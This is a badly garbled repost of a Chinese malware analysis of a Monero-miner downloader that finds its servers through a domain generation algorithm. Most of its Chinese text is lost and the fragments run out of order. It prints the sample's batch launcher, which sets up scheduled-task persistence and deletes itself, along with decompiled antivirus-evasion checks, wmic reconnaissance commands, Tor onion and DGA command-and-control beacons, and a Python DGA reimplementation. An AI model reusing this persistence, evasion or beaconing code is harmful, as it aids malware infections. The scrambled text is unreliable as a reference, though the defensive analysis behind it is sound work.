[15176] 2020-03-26_一例门罗币矿工Downloader的DGA解析

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2020-03-26_一例门罗币矿工Downloader的DGA解析 D o w n l o a d e r D G A A v e n g e r   F r e e B u f   2 0 2 0 - 0 3 - 2 6 B e r t   H u b e r t   . t i c k e t s . b l a c k f r i d a y . f e e d b a c k   D G A     T w i t t e r P a u l   M e l s o n   M D 5 3 9 c 8 6 2 0 8 2 7 a b 6 0 0 5 e 5 7 e 9 e 9 f 1 7 2 d 4 7 f f S H A 1 2 3 9 a 7 a 6 e a 5 1 5 5 b 1 8 6 3 8 1 5 f 5 9 5 8 4 1 d 0 0 c b 0 f e e c 4 6 S H A 2 5 6 e 8 2 c 9 5 e d b 6 8 0 f d 6 a 8 8 b 7 3 e b 8 3 8 9 7 5 9 f 0 3 a e b f c b 7 0 e 0 8 1 e c b 2 5 9 e a 7 3 8 e 1 6 f 8 c d d 7 7 3 4   K B 7 9 1 9 3 5 6   N u l l s o f t   P o w e r I S O 6 - F u l l . e x e   P o w e r I S O   6   M D 5 3 1 5 9 4 d 2 8 c 7 4 f 3 6 7 0 7 3 b a 1 7 a c e a 9 8 0 9 f 6 s v c h o s t c . e x e M D 5 1 d 4 7 b d 7 7 0 6 b 2 0 3 2 a a 4 1 2 5 7 c 9 2 c b 0 e 3 b 1 l a u n c h e r . b a t   s v c h o s t c . e x e     a p p d a t a   M D 5 3 1 c 7 4 0 e e 5 e b d 9 7 5 d e c d 8 3 4 5 b a a 5 f f 4 e 6   l a u n c h e r . b a t     A p p D a t a     s v c h o s t c . e x e   @ e c h o   o f f e c h o   " P A T C H I N G . . . " s e t   i n s t a l l p a t h = % ~ 1 i f   n o t   e x i s t   " % L O C A L A P P D A T A % s v c h o s t c "   m k d i r   % L O C A L A P P D A T A % s v c h o s t c   > n u l   2 > & 1 m o v e   " % i n s t a l l p a t h % s v c h o s t c . e x e "   " % L O C A L A P P D A T A % s v c h o s t c s v c h o s t c . e x e "   > n u l   2 > & 1 s c h t a s k s   / c r e a t e   / t n   s v c h o s t c   / s c   O N S T A R T   / D E L A Y   0 0 1 0 : 0 0   / R L   H I G H E S T       / t r   " % L O C A L A P P D A T A % s v c h o s t c s v c h o s t c . e x e "   / f   > n u l   2 > & 1
  G i t H u b     s v c h o s t c . e x e     C & C     D G A     P a y l o a d   G i t H u b     P a u l   M e l s o n     D o w n l o a d e r   D o w n l o a d e r     s v c h o s t c . e x e 1 d 4 7 b d 7 7 0 6 b 2 0 3 2 a a 4 1 2 5 7 c 9 2 c b 0 e 3 b 1 使 M D 5 a 4 c 3 e 4 6 3 4 2 1 9 a 9 b e 1 2 a e b a e b d 9 1 c 7 5 f a S H A 1 5 9 f f c d 2 b c 4 1 2 0 6 e c 4 e 4 d 2 6 0 9 b 8 1 8 a 8 e 8 c c 1 e c 6 7 7 S H A 2 5 6 2 a 8 2 1 e e 5 4 d 1 3 c 9 d 8 3 9 0 9 f 1 f a d c 2 8 3 b 9 3 4 0 e 3 f 0 2 4 c a c 3 6 e 9 7 b 2 9 f 8 8 a 9 4 2 7 4 7 8 8 e 2 3 2 1 3   K B 2 3 7 6 9 2 1 6   R i s k w a r e     C & C     D G A   C + +   1 . 退 2 . 3 .   C & C   4 . 使 a v T e s t s   E m e r i c   N a s i     2 0 1 4     8   B y p a s s   A n t i v i r u s   D y n a m i c   A n a l y s i s   T r u e     1 0   退 a - f l s T e s t b - w i n A p i T e s t c - t i m e D i s t o r t i o n T e s t d - s y s t e m P r o c e s s T e s t e - i n c r e m e n t T e s t f - m e m o r y T e s t     / t r   " % L O C A L A P P D A T A % s v c h o s t c s v c h o s t c . e x e "   / f   > n u l   2 > & 1 s t a r t   " "   " % L O C A L A P P D A T A % s v c h o s t c s v c h o s t c . e x e " ( g o t o )   2 > n u l   &   d e l   " % ~ f 0 " b o o l   f l s T e s t ( v o i d ) {     r e t u r n   F l s A l l o c ( 0 i 6 4 )   ! =   F L S _ O U T _ O F _ I N D E X E S ; } b o o l   w i n A p i T e s t ( v o i d ) {     H A N D L E   h P r o c e s s ;   / /   r a x     h P r o c e s s   =   G e t C u r r e n t P r o c e s s ( ) ;     r e t u r n   V i r t u a l A l l o c E x N u m a ( h P r o c e s s ,   0 i 6 4 ,   1 0 0 0 u i 6 4 ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ,   0 )   ! =   0 i 6 4 ; } _ B O O L 8   t i m e D i s t o r t i o n T e s t ( v o i d ) {     D W O R D   t i c k s _ a f t e r ;   / /   [ r s p + 2 8 h ]   [ r b p - 8 h ]     D W O R D   t i c k s _ b e f o r e ;   / /   [ r s p + 2 C h ]   [ r b p - 4 h ]     t i c k s _ b e f o r e   =   G e t T i c k C o u n t ( ) ;     S l e e p ( 1 0 0 0 u ) ;     t i c k s _ a f t e r   =   G e t T i c k C o u n t ( ) ;     r e t u r n   t i c k s _ b e f o r e   +   1 0 0 0   < =   t i c k s _ a f t e r   & &   t i c k s _ b e f o r e   +   1 5 0 0   > =   t i c k s _ a f t e r ; } b o o l   s y s t e m P r o c e s s T e s t ( v o i d ) {     r e t u r n   O p e n P r o c e s s ( P R O C E S S _ A L L _ A C C E S S ,   0 ,   4 u )   = =   0 i 6 4 ; } b o o l   i n c r e m e n t T e s t ( v o i d ) {     i n t   i ;   / /   [ r s p + 8 h ]   [ r b p - 8 h ]     i n t   c p t ;   / /   [ r s p + C h ]   [ r b p - 4 h ]     c p t   =   0 ;     f o r   (   i   =   0 ;   i   < =   9 9 9 9 9 9 9 9 ;   + + i   )         + + c p t ;     r e t u r n   c p t   = =   1 0 0 0 0 0 0 0 0 ; } _ _ i n t 6 4   m e m o r y T e s t ( v o i d ) {
  D G A   G e t S y s t e m I n f o               G i t H u b     1 5       使   b a s e 6 4   O 3 Y 6 M T U 7 Y z o y I C 1 u C g = =   T o r     D o w n l o a d e r   c m d . e x e   / c   ( w m i c   c o m p u t e r s y s t e m   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   c p u   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   m e m o r y c h i p   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   p a t h   W i n 3 2 _ V i d e o C o n t r o l l e r   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   / N o d e : l o c a l h o s t   / N a m e s p a c e : r o o t S e c u r i t y C e n t e r 2   P a t h   A n t i V i r u s P r o d u c t   G e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   n i c c o n f i g   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   o s   g e t   / f o r m a t : l i s t ) c m d . e x e   / c   ( w m i c   p a t h   W i n 3 2 _ S y s t e m E n c l o s u r e   g e t   / f o r m a t : l i s t )   T o r     T o r     0 . 3 . 3 . 7         h t t p : / / w w w . g o o g l e . c o m     T o r     T o r     G o o g l e     P a y l o a d a s x e 4 d 2 f m z 7 j i 5 u x . o n i o n d y v t 2 m l e g 3 3 f 6 z d b . o n i o n   D G A   使   T o r   D G A   使   H T T P   G E T     h e l l o . p h p     H T T P     P a y l o a d     H T T P     5 1 2     R S A   使   R S A     H T T P   D G A   D G A     P a y l o a d   {     v o i d   * B l o c k ;   / /   [ r s p + 2 8 h ]   [ r b p - 8 h ]     B l o c k   =   m a l l o c ( 1 0 0 0 0 0 0 0 0 u i 6 4 ) ;     i f   (   ! B l o c k   )         r e t u r n   0 i 6 4 ;     m e m s e t ( B l o c k ,   0 ,   1 0 0 0 0 0 0 0 0 u i 6 4 ) ;     f r e e ( B l o c k ) ;     r e t u r n   1 i 6 4 ; } C S I D L _ L O C A L _ A P P D A T A s v c h o s t c C : U s e r s U s e r A p p D a t a L o c a l s v c h o s t c w i n c a c h e < n r > < n r > ; v : < v e r s i o n > ; c : < n r o f p r o c e s s o r s > ; v : 1 5 ; c : 2 % L O C A L A P P D A T A % T e m p 1 2 7 . 0 . 0 . 1 : 9 0 5 0 G E T   / h e l l o . p h p ? i n f o = O 3 Y 6 M D t j O j I =   H T T P / 1 . 1 H o s t :   3 1 b 4 b d 3 1 f g 1 x 2 . o r g   C o n n e c t i o n :   c l o s e C o n t e n t - L e n g t h < l e n g t h > r n < 5 1 2   B y t e s   s i g n a t u r e > < v e r s i o n   n r > 3 0 8 2 0 1 2 0 3 0 0 D 0 6 0 9 2 A 8 6 4 8 8 6 F 7 0 D 0 1 0 1 0 1 0 5 0 0 0 3 8 2 0 1 0 D 0 0 3 0 8 2 0 1 0 8 0 2 8 2 0 1 0 1 0 0 B 5 E 3 F E 0 7 2 C 6 4 4 E 0 9 E 2 7 6 * * 8 * * 3 D F 8 9 4 4 F B 9 D E 9 8 6 4 1 F 9 F A 2 4 7 8 5 B 1 2 1 7 5 8 1 9 2 4 2 9 9 D 5 C B F F 5 F F A 8 0 3 A 5 A 8 8 F 5 4 1 4 2 E 9 1 2 4 E 4 1 B A 2 E 9 A E 6 8 6 2 D 5 5 4 2 D 7 5 9 2 8 4 6 E 8 5 3 F 5 C 0 4 A E C 3 3 5 5 0 C B 8 0 2 3 C E 9 7 8 0 E 1 5 B 4 B 6 E 1 C G E T   / b i n a r y   H T T P / 1 . 1 H o s t :   3 1 b 4 b d 3 1 f g 1 x 2 . o r g   C o n n e c t i o n :   c l o s e
D o w n l o a d e r   . o r g . t i c k e t s . b l a c k f r i d a y . h o s t i n g . f e e d b a c k 线 线 D G A   使     4 9 9   1 .   1 9 7 0 . 1 . 1   2 .   M a g i c   N u m b e r j k h h k s u g r h t i j y s 7 8 g 4 6 1     4 9 9 线   j k h h k s u g r h t i j y s 7 8 g 4 6 - 1 8 2 4 3 - 1 3 .   M D 5     4 . 使   1 3   线   0 0 1 2 0 3 4 3 a 5 d c 7 . o r g   P y t h o n     D G A   3 1 b 4 b d 3 1 f g 1 x 2 0 0 1 2 0 3 4 3 a 5 d c 7 d 2 e 4 e 1 1 9 3 8 b 0 e 1 f e d 4 3 f r o m   d a t e t i m e   i m p o r t   d a t e t i m e i m p o r t   h a s h l i b i m p o r t   a r g p a r s e t l d s   =   [         " . o r g " ,         " . t i c k e t s " ,         " . b l a c k f r i d a y " ,         " . h o s t i n g " ,         " . f e e d b a c k " , ] m a g i c   =   " j k h h k s u g r h t i j y s 7 8 g 4 6 " s p e c i a l   =   " 3 1 b 4 b d 3 1 f g 1 x 2 " d e f   d g a ( d a t e ,   b a c k = 0 ) :         e p o c h   =   d a t e t i m e ( 1 9 7 0 ,   1 ,   1 )         d a y s _ s i n c e _ e p o c h   =   ( d a t e   -   e p o c h ) . d a y s         d a y s   =   d a y s _ s i n c e _ e p o c h         f o r   j   i n   r a n g e ( b a c k + 1 ) :                 f o r   n r   i n   r a n g e ( 5 0 0 ) :                         f o r   t l d   i n   t l d s :                                 s e e d   =   " { } - { } - { } " . f o r m a t ( m a g i c ,   d a y s ,   n r )                                 m   =   h a s h l i b . m d 5 ( s e e d . e n c o d e ( ' a s c i i ' ) ) . h e x d i g e s t ( )                                 m c   =   m [ : 1 3 ]                                 i f   n r   = =   0 :                                         s l d   =   s p e c i a l                                 e l s e :                                         s l d   =   m c                                 d o m a i n   =   " { } { } " . f o r m a t ( s l d ,   t l d )                                 y i e l d   d o m a i n
  2 0 1 8     4     1 0   M D 5     M a g i c   1   4 9 9 + 1   线 线 . o r g . t i c k e t s . b l a c k f r i d a y . h o s t i n g . f e e d b a c k a - z 0 - f 1 3 * j o h a n n e s b a d e r F B     A v e n g e r   F r e e B u f . C O M                 d a y s   - =   1 i f   _ _ n a m e _ _   = =   " _ _ m a i n _ _ " :         p a r s e r   =   a r g p a r s e . A r g u m e n t P a r s e r ( )         p a r s e r . a d d _ a r g u m e n t ( " - d " ,   " - - d a t e " ,   h e l p = " d a t e   w h e n   d o m a i n s   a r e   g e n e r a t e d " )         a r g s   =   p a r s e r . p a r s e _ a r g s ( )         i f   a r g s . d a t e :                 d   =   d a t e t i m e . s t r p t i m e ( a r g s . d a t e ,   " % Y - % m - % d " )         e l s e :                 d   =   d a t e t i m e . n o w ( )         f o r   d o m a i n   i n   d g a ( d ) :                 p r i n t ( d o m a i n ) p y t h o n 3   d g a . p y   - - d a t e   2 0 1 8 - 0 4 - 1 0

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则